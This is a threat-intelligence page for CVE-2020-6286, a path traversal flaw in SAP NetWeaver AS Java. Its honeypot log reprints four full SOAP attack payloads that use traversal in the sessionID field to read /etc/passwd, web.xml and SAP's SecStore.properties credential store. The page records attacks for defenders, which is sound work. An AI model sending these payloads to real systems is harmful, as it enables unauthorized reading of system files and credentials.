Vulnerability detail
Enriched intelligence for a single CVE
Medium
CVE-2020-6286
PUBLISHEDThe insufficient input path validation of certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30,...
Not yet in CISA KEV
- Vendor
- SAP SE
- Product
- SAP NetWeaver AS JAVA (LM Configuration Wizard)
- Published
- Jul 14, 2020
- EPSS
- 85.7% · 99% pctl
Automate this intelligence with the Pro API
Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.
Description
The insufficient input path validation of certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to exploit a method to download zip files to a specific directory, leading to Path Traversal.
Weaknesses (CWE)
-
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploitation status
Exploited in the wild
Recorded 2026-06-12 00:32:46 UTC · KEVIntel
Proof of concept available
Recorded 2020-08-13 09:00:12 UTC · GitHub
Observed exploitation attempts
Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.
- Attempts observed
- 4
- Unique attacker IPs
- 1
- Attacker countries
- 🇭🇰
- Sensors observed
- 1
Exploitation attempts over the last 30 days
First observed 2026-06-12 17:20 UTC · Last observed 2026-06-12 17:20 UTC
Recent attempts
Showing observations from the last 30 days.
| Attack Time | Attacker | Sensor | Request | Confidence | Raw Event |
|---|---|---|---|---|---|
|
2026-06-12 17:20 UTC
1 day ago
|
🇭🇰 43.198.12.3Hong Kong, Hong Kong Seen 4 times |
🇪🇺
SAP NetWeaver AS Java
|
POST /CTCWebService/CTCWebServiceBean
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
|
High |
View Hide
Attacker
43.198.12.3
🇭🇰
Hong Kong, Hong Kong
Request
POST /CTCWebService/CTCWebServiceBean
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
Payload fingerprint
sha256:3ef30903a9ed0f1f2a143ceb925de68c6006e7b520138463f1ea5385a3521843
Payload
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header/>
<soapenv:Body>
<urn:queryProtocol>
<sessionID>../../../../../../../../etc/hosts</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>
Source
KEVIntel Honeypot
|
|
2026-06-12 17:20 UTC
1 day ago
|
🇭🇰 43.198.12.3Hong Kong, Hong Kong Seen 4 times |
🇪🇺
SAP NetWeaver AS Java
|
POST /CTCWebService/CTCWebServiceBean
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
|
High |
View Hide
Attacker
43.198.12.3
🇭🇰
Hong Kong, Hong Kong
Request
POST /CTCWebService/CTCWebServiceBean
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
Payload fingerprint
sha256:848d011004a71770cc127f5531a298206a448dfc1a877a5720b41e37d121ae9f
Payload
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header/>
<soapenv:Body>
<urn:queryProtocol>
<sessionID>../../../../../../usr/sap/NPL/SYS/global/security/data/SecStore.properties</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>
Source
KEVIntel Honeypot
|
|
2026-06-12 17:20 UTC
1 day ago
|
🇭🇰 43.198.12.3Hong Kong, Hong Kong Seen 4 times |
🇪🇺
SAP NetWeaver AS Java
|
POST /CTCWebService/CTCWebServiceBean
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
|
High |
View Hide
Attacker
43.198.12.3
🇭🇰
Hong Kong, Hong Kong
Request
POST /CTCWebService/CTCWebServiceBean
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
Payload fingerprint
sha256:34e81b48a2501a9a5fef0b6141ff8ee2c4b19217d53e87a0113ab56315587718
Payload
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header/>
<soapenv:Body>
<urn:queryProtocol>
<sessionID>../../../../../WEB-INF/web.xml</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>
Source
KEVIntel Honeypot
|
|
2026-06-12 17:20 UTC
1 day ago
|
🇭🇰 43.198.12.3Hong Kong, Hong Kong Seen 4 times |
🇪🇺
SAP NetWeaver AS Java
|
POST /CTCWebService/CTCWebServiceBean
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
|
High |
View Hide
Attacker
43.198.12.3
🇭🇰
Hong Kong, Hong Kong
Request
POST /CTCWebService/CTCWebServiceBean
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36
Payload fingerprint
sha256:845d77c7f92038948dffa0a50891fc86dbec751805e0017190934df001c85ec3
Payload
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header/>
<soapenv:Body>
<urn:queryProtocol>
<sessionID>../../../../../../../../etc/passwd</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>
Source
KEVIntel Honeypot
|
Known exploited vulnerability sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| KEVIntel First | 2026-06-12 00:32 UTC |
Potential proof of concepts
These PoCs are unverified and could contain malware. Use at your own risk.
github · Created 2020-08-13 09:00:12 UTC · 6 stars
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal
Timeline
-
Added to KEVIntel
-
Proof of Concept Exploit Available
-
CVE Published to Public
-
CVE ID Reserved